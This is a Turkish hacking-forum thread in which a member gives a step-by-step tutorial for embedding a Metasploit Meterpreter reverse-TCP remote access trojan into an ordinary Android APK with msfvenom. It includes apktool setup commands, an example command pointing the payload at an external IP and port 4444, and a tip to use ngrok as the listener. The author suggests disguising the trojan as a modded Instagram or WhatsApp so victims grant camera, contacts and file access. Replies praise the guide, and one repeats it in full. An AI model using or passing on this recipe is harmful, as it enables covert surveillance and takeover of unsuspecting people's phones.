M.e.t.aSploit Msfvenom ile Android Apk Dosyasına Rat Enjekte Etme

B3YD4

Yeni üye
27 Şub 2019
10
2
Merhaba arkadaşlar bugün sizlere herhangi bir apk dosyası içine rat enjekte etmeyi göstereceğim, herhangi bir apk dosyası içine rat enjekte edince genel de cihaz rat olduğunu algılamayıp tehlikeli yazılım diye kullanıcıya error vermiyor ancak kullanıcının uygulama izinlerinden izin vermesi lazım olabiliyor bu yüzden ben genel de modlu instagram veya modlu whatsapp yükletiyorum bunun gibi uygulamalar genelde zaten kendisi rehber,kamera,dosyalara erişim için izin istiyor hemen uygulamamıza geçelim bize 2 tane dosya lazım bitanesi "apktool.jar" diğeri ise "apktool" isimli 2
dosya






apktool.jar : https://bitbucket.org/iBotPeaches/apktool/downloads/ bu site den son sürümünü indirin


apktool : https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool


apktoolun sitesine gittiğimiz de önümüze bash script kodları çıkıyor hemen masaüstünde terminal açıp oraya "nano apktool" yazalım ve bu sitede ki kodları oraya yapıştırıp kayıt edelim "apktool.jar" ı indirip masaüstünde alalım ve şimdi sıra onları taşımada hemen masaüstünde bir terminal açıp:


"sudo mv apktool /usr/local/bin/"
klasörüne apktool'u


"sudo mv apktool.jar /usr/local/bin/"
klasörüne'de apktool.jar isimli dosyamızı çalıştıralım ve bunlara yetki verelim





şimdi sıra yetki verme işlemlerimizde :hosnut

"cd /usr/local/bin/"


dizinine gidelim ve yetki verelim


"sudo chmod +x apktool.jar"


"sudo chmod +x apktool"





yetki verdikten sonra artık masaüstüne gelelim ve apk dosyamızı masaüstünde alalım sıra msfvenom ile artık ratı apk içine enjekte etmede :mahcup: masaüstünde bir terminal açalım ve içine:


"sudo msfvenom -x apk_ismi -p android/meterpreter/reverse_tcp lhost = dış_ip_adresiniz lport = portunuz -o yeni_apk_isminiz.apk"



örnek kod :



"sudo msfvenom -x oyun.apk -p android/meterpreter/reverse_tcp lhost=5.15.28.135 lport=4444 -o yarisoyunu.apk"


Çıktı Resmi:






Umarım ki işinize yaramıştır veya yarayacaktır bir teşekkürünüz yeterli iyi forumlar <3 <3 <3 :kalp:mahcup:


Arkadaşlar ben ip adresi yerine ngrok kullandım oradaki ip adresim 0.tcp.ngrok.io o sizin kafanızı karıştırmasın orası sizin ip adresiniz olucaktır veya cgn ip de iseniz port açamıyorsanız bnm gibi ngrok kullanın umarım anlaşılmayan bişi yoktur örnek koda bakmanızı tavsiye ederim
 
Son düzenleme:

ogoktas14

Üye
3 Nis 2020
182
5
hackerone
Cevap: ****sploit ile Android Apk Dosyasına Rat Enjekte Etme

Daha fazla resim ve daha güzel yazı renkleri ile daha güzel olacaktır. Ellerine sağlık
 

HELLOBOYS

Katılımcı Üye
2 Ara 2019
324
4
Cevap: MSfvenom ile Android Apk Dosyasına Rat Enjekte Etme

Arkadaşında dediği gibi biraz daha fotoğrafla daha güzel olucaktır ellerine sağlık
 

ѕeleɴια

Deneyimli Moderatör
18 May 2018
2,369
353
Kodları kod satırı açıp yazabilrdin eline sağlık. Onun dışında kodların rengi ni görünmesi daha rahat yapabilirdin. Ama onun dışında gayet güzel emeğine sağlık
 

B3YD4

Yeni üye
27 Şub 2019
10
2
Dostum apktool.jar indirilmiyor

VPN kullanarak indirmeyi dene javascript/java gibi şeyler genel de virüs olarak görünebiliyor :) :))

Benim anlamadım tek şey oluşturduğumuz rat apk'sı içerisine nasıl atıyoruz ?


Dostum örnek kodu bidaha incelemelisin

örnek kod: "sudo msfvenom -x oyun.apk -p android/meterpreter/reverse_tcp lhost=5.15.28.135 lport=4444 -o yarisoyunu.apk"

"sudo msfvenom -X OYUN.APK" yazarak hangi apk ya rat enjekte edeceğimizi belirttik ve kodun sonunda da gördüğün gibi "-O YARİSOYUNU.APK" yazmışız ve orada ise apk dosyamızın içine rat enjekte edildilkten sonra ki ismini girmiş olduk normal apk nın ismi "oyun.apk" iken ratlı apk dosyamızın ismi "yarisoyunu.apk" oldu umarım gayet açıklayıcı olmuştur anlamadığınız biryer varsa cevap vermek'den çekinmeyin iyi forumlar <3
 
5 May 2022
73
5
Berlin
Merhaba arkadaşlar bugün sizlere herhangi bir apk dosyası içine rat enjekte etmeyi göstereceğim, herhangi bir apk dosyası içine rat enjekte edince genel de cihaz rat olduğunu algılamayıp tehlikeli yazılım diye kullanıcıya error vermiyor ancak kullanıcının uygulama izinlerinden izin vermesi lazım olabiliyor bu yüzden ben genel de modlu instagram veya modlu whatsapp yükletiyorum bunun gibi uygulamalar genelde zaten kendisi rehber,kamera,dosyalara erişim için izin istiyor hemen uygulamamıza geçelim bize 2 tane dosya lazım bitanesi "apktool.jar" diğeri ise "apktool" isimli 2
dosya






apktool.jar : iBotPeaches / Apktool / Downloads — Bitbucket bu site den son sürümünü indirin


apktool : https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool


apktoolun sitesine gittiğimiz de önümüze bash script kodları çıkıyor hemen masaüstünde terminal açıp oraya "nano apktool" yazalım ve bu sitede ki kodları oraya yapıştırıp kayıt edelim "apktool.jar" ı indirip masaüstünde alalım ve şimdi sıra onları taşımada hemen masaüstünde bir terminal açıp:


"sudo mv apktool /usr/local/bin/"
klasörüne apktool'u


"sudo mv apktool.jar /usr/local/bin/"
klasörüne'de apktool.jar isimli dosyamızı çalıştıralım ve bunlara yetki verelim





şimdi sıra yetki verme işlemlerimizde :hosnut

"cd /usr/local/bin/"


dizinine gidelim ve yetki verelim


"sudo chmod +x apktool.jar"


"sudo chmod +x apktool"





yetki verdikten sonra artık masaüstüne gelelim ve apk dosyamızı masaüstünde alalım sıra msfvenom ile artık ratı apk içine enjekte etmede :mahcup: masaüstünde bir terminal açalım ve içine:


"sudo msfvenom -x apk_ismi -p android/meterpreter/reverse_tcp lhost = dış_ip_adresiniz lport = portunuz -o yeni_apk_isminiz.apk"



örnek kod :



"sudo msfvenom -x oyun.apk -p android/meterpreter/reverse_tcp lhost=5.15.28.135 lport=4444 -o yarisoyunu.apk"


Çıktı Resmi:






Umarım ki işinize yaramıştır veya yarayacaktır bir teşekkürünüz yeterli iyi forumlar <3 <3 <3 :kalp:mahcup:


Arkadaşlar ben ip adresi yerine ngrok kullandım oradaki ip adresim 0.tcp.ngrok.io o sizin kafanızı karıştırmasın orası sizin ip adresiniz olucaktır veya cgn ip de iseniz port açamıyorsanız bnm gibi ngrok kullanın umarım anlaşılmayan bişi yoktur örnek koda bakmanızı tavsiye ederim
Çok Açıklayıcı ... Çok Rahat Çok Profesyönel... <3
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.